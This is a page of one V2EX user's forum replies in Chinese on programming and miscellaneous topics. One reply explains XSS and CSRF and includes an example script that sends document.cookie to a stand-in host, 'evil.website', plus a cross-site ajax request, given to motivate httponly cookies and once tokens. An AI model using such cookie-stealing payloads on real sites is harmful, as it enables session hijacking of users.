V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  no1xsyzy  ›  全部回复第 75 页 / 共 267 页
回复总数  5322
1 ... 71  72  73  74  75  76  77  78  79  80 ... 267  
2021-02-04 11:56:51 +08:00
回复了 50vip 创建的主题 分享创造 [开源] < 800 bytes 用一个更爽的方式生成 mock 假数据
假数据不是 mock 而是 dummy data 或者 fake data 。mock 是指假调用
搜索了一下,比如 npm i fake-data-generator 这个,其实很像,不过是写 json 配置的
2021-02-03 19:21:30 +08:00
回复了 zzzzzzggggggg 创建的主题 程序员 运营一个严肃的技术群应该注意什么?
@VersionD (其实就是公众号(
2021-02-03 19:20:35 +08:00
回复了 LeeReamond 创建的主题 信息安全 csrf 攻击一般是如何防御的?
@ReinerShir TL;DR: 只要前端不羁越框架、前后端沟通顺畅,就没有。

XSS 漏洞的产生主要来源于偷懒,并不是本质易受攻击(和 CSRF 不一样)
和 eval 问题相似,你是完全可以写一个彻底安全的 sandbox eval 的,只要重新写一套词法分析器、语法分析器、解释器,然后把恰当的接口暴露给该环境就行。但是 eval 放那儿,图方便就直接调用了,就产生了漏洞。
HTML/DOM 同理,div.innerHTML = user_input_string 只是一个 HTML/DOM 下的 eval 罢了。
其次就是疏忽。
凡称“框架”必能解决这两个问题,在框架内办事,就出不了格。
2021-02-03 14:31:18 +08:00
回复了 kuaizhuanqian 创建的主题 问与答 昨夜未眠,不知活着的意义。
@doudou1523102 一个黑一个白那不跟混合双打差不多…… 传统上说的是一个红一个白(
2021-02-03 14:12:25 +08:00
回复了 codists 创建的主题 Python 翻译:《实用的 Python 编程》01_Introduction_00_Overview
V2 发出来的东西又不能修改,链接留空没意义啊
2021-02-03 14:09:52 +08:00
回复了 LeeReamond 创建的主题 信息安全 csrf 攻击一般是如何防御的?
打个比方,你在访问 V2 时有人 XSS:
<script> fetch("http://evil.website/upload/cookie", {data:document.cookie}); </script>
如果没过滤,那你的 cookie 就泄漏给了第三方网站
httponly 阻止了 js 读取 cookie

而如果你在访问 evil.website 时,evil.website 的拥有者攻击你。
<script> $.ajax("https:////v2ex.com/thank/topic/...") </script>
就算根本不是同一个网站,但却可以在请求的时候让它自动带上 cookie,这就是 CSRF 。
所以有个 once 值,只有知道最新的 once 值才能发送感谢。

这两个可能混淆的一点就是把 XSS 作中间跳板
通过一个网站的 XSS 漏洞实现对另一个网站的 CSRF 攻击
2021-02-03 13:53:58 +08:00
回复了 asanelder 创建的主题 程序员 想看 SCIP, 铁子们有没有推荐的打开姿势?
@levelworm 如果有软件工程的底子应当是没问题的,但不确定是否有部分前面直接疏通过去了
2021-02-03 12:37:12 +08:00
回复了 zzzzzzggggggg 创建的主题 程序员 运营一个严肃的技术群应该注意什么?
不知是楼上某些误解,还是我误解了楼主的意思

在我看来,讨论不是干货,而是彻头彻尾的生鲜。
2021-02-03 12:15:50 +08:00
回复了 zzzzzzggggggg 创建的主题 程序员 运营一个严肃的技术群应该注意什么?
禁止任何人发言
群主自己发送一篇干货
干货比例 100%
别无他法
2021-02-03 12:14:46 +08:00
回复了 volvo007 创建的主题 JavaScript 请教一个 js 箭头函数的基础问题
@volvo007 500 多节到底是在讲什么?疯了吧

就算不知道 IIFE,给它个名字然后再 call
getURL = () => {...}
url = getURL()
总行吧
2021-02-03 10:59:23 +08:00
回复了 biguokang 创建的主题 程序员 一个关于 iframe 很艹蛋的前端需求
用 Nginx 反代改成同域啊
Aria2 的老技巧了(
2021-02-03 10:55:42 +08:00
回复了 darknoll 创建的主题 Vue.js vue 有没有啥轻量级的脚手架啊, vue-cli 太重了
脚手架装到 --global 里啊(
2021-02-01 15:59:04 +08:00
回复了 tomjack 创建的主题 程序员 思否观看其他问题关注的问题
把整个覆盖层加进带元素筛选的 adblock 工具或者 user style
2021-02-01 14:08:43 +08:00
回复了 lili1397 创建的主题 奇思妙想 一道脑洞大开的计算问题
话说以前那个可以借一个空瓶还一个空瓶的话就是简单代数问题:
2 * 空瓶 = 1 净重 * 水 + 1 * 空瓶 = 1 RMB
1 净重 * 水 = 0.5 RMB

不能借瓶子的话其实是个动规问题,但猜想可能有解析解。
* 冷知识:因为你从出版商买论文,论文作者也不会多拿一分钱,所以其实你可以直接电邮论文作者要一份电子拷贝,据说多半会给。
2021-02-01 03:28:36 +08:00
回复了 fsship 创建的主题 随想 现有的各种软件项目,会不会已经存在一些能活到下个世纪的?
特定工具的话,yes true false cat 之类应该已经处于完美状态了
重点就是,人们也根本不会在意它有什么新功能,或者需要什么新改动。
GNU yes 能达到几个 G 又如何?
真有人这么用吗?(
2021-02-01 03:07:23 +08:00
回复了 billytv 创建的主题 奇思妙想 大数据时代保护隐私的另一方向:往大数据里投毒
想来我的操作一直就是在投毒
脑洞太大,总是搜索些奇奇怪怪的东西,并且脑洞大到搜索不出来
自认为可用千兆,收到对端握手是百兆
基本可以认为问题出在物理链路上。
甚至可能网口坏了
2021-01-31 21:50:19 +08:00
回复了 ddeef 创建的主题 程序员 你实现编程自由了么?
总有一根 “要把代码(性能、可读性等等)优化” 的弦

要编程自由,什么时候能来点混乱邪恶的代码
不要意大利面条代码,
来点红心火龙果炒鱿鱼须代码、姜丝炒土豆丝代码、小番茄炒灯笼椒代码。
2021-01-31 21:38:59 +08:00
回复了 LPeJuN6lLsS9 创建的主题 Linux 装好的 Linux 还有办法减肥吗
为什么不用 docker-compose 配好一堆服务,把 yaml 文件发过去就好了啊(
1 ... 71  72  73  74  75  76  77  78  79  80 ... 267  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   737 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 53ms · UTC 21:58 · PVG 05:58 · LAX 14:58 · JFK 17:58
Developed with CodeLauncher
♥ Do have faith in what you're doing.